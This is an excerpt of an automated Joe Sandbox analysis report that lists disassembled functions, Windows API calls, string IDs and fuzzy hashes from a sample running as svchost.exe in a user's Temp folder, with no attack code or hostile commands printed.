                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: e09312784fd137544de0b47baef5b4b2bf88ed08ee18f16de907dd998dc06fca
                                                            • Instruction ID: 9e55c5d88b1921cbd9943dc7e98d0fc345da80ada278dbd3c17c43f523811213
                                                            • Opcode Fuzzy Hash: e09312784fd137544de0b47baef5b4b2bf88ed08ee18f16de907dd998dc06fca
                                                            • Instruction Fuzzy Hash: 33E08670D14F129EC7209FB8984DB027AD4FF44701F15982DF1EAD3781DAB8D5408B91
                                                            Function 00852BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: 17a1f8e510c13bbfb3c276eb497c0e34d62ba1340094040cf1a72765ee6b14e3
                                                            • Instruction ID: 8a009839fc4e710de41735ed1b773c28a7e5e8b7dea391eb419669a77fc64513
                                                            • Opcode Fuzzy Hash: 17a1f8e510c13bbfb3c276eb497c0e34d62ba1340094040cf1a72765ee6b14e3
                                                            • Instruction Fuzzy Hash: 9C51F87250021AAFDB298F18D845BBA73B5FF55312F24412DEC05C76A2EB31ED48D791
                                                            Function 0085BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0085BF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0085BF5C
                                                              • Part of subcall function 00858E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0085CA2C,00000000,?,00856CBE,?,00000008,?,008591E0,?,?,?), ref: 00858E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0085BF82
                                                            • _free.LIBCMT ref: 0085BF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0085BFA4
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 604a0e771a2a5323935fcd3e2dfad6d67fc84b337961447da095144c42af6615
                                                            • Instruction ID: ef8803f54251d95927cb8fdbcdb763c9c757e2b53c9363c7fde4c0f8c4d3d24f
                                                            • Opcode Fuzzy Hash: 604a0e771a2a5323935fcd3e2dfad6d67fc84b337961447da095144c42af6615
                                                            • Instruction Fuzzy Hash: 2901A272A05615BF23211ABA5C8DC7F7A6EFED3BA23150129FD04D3241EFA0CD0595B1
                                                            Function 00859869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00871030,00000200,008591AD,0085617E,?,?,?,?,0083D984,?,?,?,00000004,0083D710,?), ref: 0085986E
                                                            • _free.LIBCMT ref: 008598A3
                                                            • _free.LIBCMT ref: 008598CA
                                                            • SetLastError.KERNEL32(00000000,00863A34,00000050,00871030), ref: 008598D7
                                                            • SetLastError.KERNEL32(00000000,00863A34,00000050,00871030), ref: 008598E0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 3a060a64772845c14cf13834457633627fc9a442972d2f3bd05748fbaebb205b
                                                            • Instruction ID: 3e589496a936ce50efd3557a44577db2bd29c291eb4e5144ff1a6f02f839ae3d
                                                            • Opcode Fuzzy Hash: 3a060a64772845c14cf13834457633627fc9a442972d2f3bd05748fbaebb205b
                                                            • Instruction Fuzzy Hash: 6601F436144B09EBC21227686C8591B256DFBE3777B260135FD55E2292EF608C0D5162
                                                            Function 00840EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008411CF: ResetEvent.KERNEL32(?), ref: 008411E1
                                                              • Part of subcall function 008411CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008411F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00840F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 00840F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 00840F54
                                                            • CloseHandle.KERNEL32(?), ref: 00840F60
                                                            • CloseHandle.KERNEL32(?), ref: 00840F6C
                                                              • Part of subcall function 00840FE4: WaitForSingleObject.KERNEL32(?,000000FF,00841206,?), ref: 00840FEA
                                                              • Part of subcall function 00840FE4: GetLastError.KERNEL32(?), ref: 00840FF6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            • Opcode ID: 073fd0ab8825baf1911e83a7725a9ae1e951cf1dd482a9c6f38e85178d46f15d
                                                            • Instruction ID: b204105a343de48a39ec57290adebdc100c47fc3d0f5f17ae58ef4c07c49b048
                                                            • Opcode Fuzzy Hash: 073fd0ab8825baf1911e83a7725a9ae1e951cf1dd482a9c6f38e85178d46f15d
                                                            • Instruction Fuzzy Hash: D5017571100B44FFC7229B64DC84BC6FBA9FB08710F010929F26B921A0CBB57A58CB55
                                                            Function 0085C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0085C817
                                                              • Part of subcall function 00858DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34), ref: 00858DE2
                                                              • Part of subcall function 00858DCC: GetLastError.KERNEL32(00863A34,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34,00863A34), ref: 00858DF4
                                                            • _free.LIBCMT ref: 0085C829
                                                            • _free.LIBCMT ref: 0085C83B
                                                            • _free.LIBCMT ref: 0085C84D
                                                            • _free.LIBCMT ref: 0085C85F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 570151b8b167c4eb387a936d02d6be71f59c95a1fbc1384d639206afc7abc296
                                                            • Instruction ID: 43278dd86f2e5b41979c3f217bf3e2a59d5ec22cd1f031c541e1e31172a24ff1
                                                            • Opcode Fuzzy Hash: 570151b8b167c4eb387a936d02d6be71f59c95a1fbc1384d639206afc7abc296
                                                            • Instruction Fuzzy Hash: ECF01236504304EF8620DB6CF485C1677F9FA10756755282AF948E7552CFB1FC88CE55
                                                            Function 00841FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00841FE5
                                                            • _wcslen.LIBCMT ref: 00841FF6
                                                            • _wcslen.LIBCMT ref: 00842006
                                                            • _wcslen.LIBCMT ref: 00842014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0083B371,?,?,00000000,?,?,?), ref: 0084202F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            • Opcode ID: 3c6a086f0d66fdb6020272a604ccc63ef10a33e4896587692a7b77b8394f4933
                                                            • Instruction ID: 19aa2b800a1447101871918d4456a9a01139b8a400051a3692e5bc5e0d0b9019
                                                            • Opcode Fuzzy Hash: 3c6a086f0d66fdb6020272a604ccc63ef10a33e4896587692a7b77b8394f4933
                                                            • Instruction Fuzzy Hash: 76F06D32408018BBCF225F94EC0AD8A7F66FB407B1B118005FA1A9B061CB729A65D691
                                                            Function 00858900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0085891E
                                                              • Part of subcall function 00858DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34), ref: 00858DE2
                                                              • Part of subcall function 00858DCC: GetLastError.KERNEL32(00863A34,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34,00863A34), ref: 00858DF4
                                                            • _free.LIBCMT ref: 00858930
                                                            • _free.LIBCMT ref: 00858943
                                                            • _free.LIBCMT ref: 00858954
                                                            • _free.LIBCMT ref: 00858965
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 992bca7f948063cb9fc29790c1b1014987f752a6570d11e86ca4f797c1338361
                                                            • Instruction ID: bea24e51abc541926734500e2fc091002825da9a0c13231e0fbb9b5b6bf51729
                                                            • Opcode Fuzzy Hash: 992bca7f948063cb9fc29790c1b1014987f752a6570d11e86ca4f797c1338361
                                                            • Instruction Fuzzy Hash: 2FF05E75815126EBCB067F58FC024057FF1F7247113091607F914E36B1DB724949DB82
                                                            Function 008415FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            • Opcode ID: cc493c60d84cfa6b1277be50d398bef133e4c1aea2dfb900a959ecd929b21eb2
                                                            • Instruction ID: b5eba07b52d24910cad73b8f11072a799211b317d38ee467f2901fe0d468b480
                                                            • Opcode Fuzzy Hash: cc493c60d84cfa6b1277be50d398bef133e4c1aea2dfb900a959ecd929b21eb2
                                                            • Instruction Fuzzy Hash: 7B513D3138830CF6EE211A948D4FF35B266FB25B0CF144516F396E48E1DAA2E4D0A71B
                                                            Function 00857F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\svchost.exe,00000104), ref: 00857FAE
                                                            • _free.LIBCMT ref: 00858079
                                                            • _free.LIBCMT ref: 00858083
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\AppData\Local\Temp\svchost.exe
                                                            • API String ID: 2506810119-58718599
                                                            • Opcode ID: aa2617710de3ab00bb77d603857cb9734dc13093ef9ebb6a75ebeb6a7e0acf4e
                                                            • Instruction ID: 26a051704e73f77504257a722b84314d1210f9ecec8ff4d5dd97cd1f60452359
                                                            • Opcode Fuzzy Hash: aa2617710de3ab00bb77d603857cb9734dc13093ef9ebb6a75ebeb6a7e0acf4e
                                                            • Instruction Fuzzy Hash: 0A31AF71A04618EFCB21EF999C8599EBBFCFB94312F144167ED04E7250DA708A48CB91
                                                            Function 008531D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008531FB
                                                            • _abort.LIBCMT ref: 00853306
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            • Opcode ID: 623e815916e4175b59a72d361f185bc69812825ac6189226b098182746cb965f
                                                            • Instruction ID: 45450f9d92a1b1ea29a0c4eff3aa796588f6f93d3d5dbdb343552df94533da35
                                                            • Opcode Fuzzy Hash: 623e815916e4175b59a72d361f185bc69812825ac6189226b098182746cb965f
                                                            • Instruction Fuzzy Hash: 17414772900209AFCF16DF98CD81AEEBBB5FF48346F188059FD08A7221D735AA54DB51
                                                            Function 00837401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00837406
                                                              • Part of subcall function 00833BBA: __EH_prolog.LIBCMT ref: 00833BBF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 008374CD
                                                              • Part of subcall function 00837A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00837AAB
                                                              • Part of subcall function 00837A9C: GetLastError.KERNEL32 ref: 00837AF1
                                                              • Part of subcall function 00837A9C: CloseHandle.KERNEL32(?), ref: 00837B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            • Opcode ID: 34329a9955fd71347a6a0f6db236e57366629594c6d6acf5776e1ecfb97ac136
                                                            • Instruction ID: 94f7ea7c67eea994bb84f5d7e60b501677f4131ed551e65c1b21e3e308779a4a
                                                            • Opcode Fuzzy Hash: 34329a9955fd71347a6a0f6db236e57366629594c6d6acf5776e1ecfb97ac136
                                                            • Instruction Fuzzy Hash: 7B31B4B1D04258AADF21EBA8CC49BEE7BB9FF85304F044015F545E7282DB74DA84C7A2
                                                            Function 0084AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • EndDialog.USER32(?,00000001), ref: 0084AD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0084ADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0084ADC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            • Opcode ID: fc02abab7abb328ff46066c8d8f9031f7d645b4b4f734cef826a9a6ce9767279
                                                            • Instruction ID: d47c4fb85d4feeb188030078d15751b1797ab694ca53457b4336fda13deb74f3
                                                            • Opcode Fuzzy Hash: fc02abab7abb328ff46066c8d8f9031f7d645b4b4f734cef826a9a6ce9767279
                                                            • Instruction Fuzzy Hash: B011B132AC4208BFDB15AF689C09FAA7B69FB9A746F040411F241EE5A0C7629905D763
                                                            Function 0083D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 0083D954
                                                            • _strncpy.LIBCMT ref: 0083D99A
                                                              • Part of subcall function 00841DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00871030,00000200,0083D928,00000000,?,00000050,00871030), ref: 00841DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            • Opcode ID: f26917d77976a935b2bee78a19536ba978f3599d963fdf536ae3b76fdd649b1b
                                                            • Instruction ID: 0970c369644030fdebd6ce8571457eeb0a05afe86d60904a84b61731156fcaee
                                                            • Opcode Fuzzy Hash: f26917d77976a935b2bee78a19536ba978f3599d963fdf536ae3b76fdd649b1b
                                                            • Instruction Fuzzy Hash: E0216F7244034CAEEB20DEA4DC05FDE7FE8FB45304F040511FD10D6292E675D6589B91
                                                            Function 00840E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0083AC5A,00000008,?,00000000,?,0083D22D,?,00000000), ref: 00840E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0083AC5A,00000008,?,00000000,?,0083D22D,?,00000000), ref: 00840E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0083AC5A,00000008,?,00000000,?,0083D22D,?,00000000), ref: 00840E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 00840EB7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
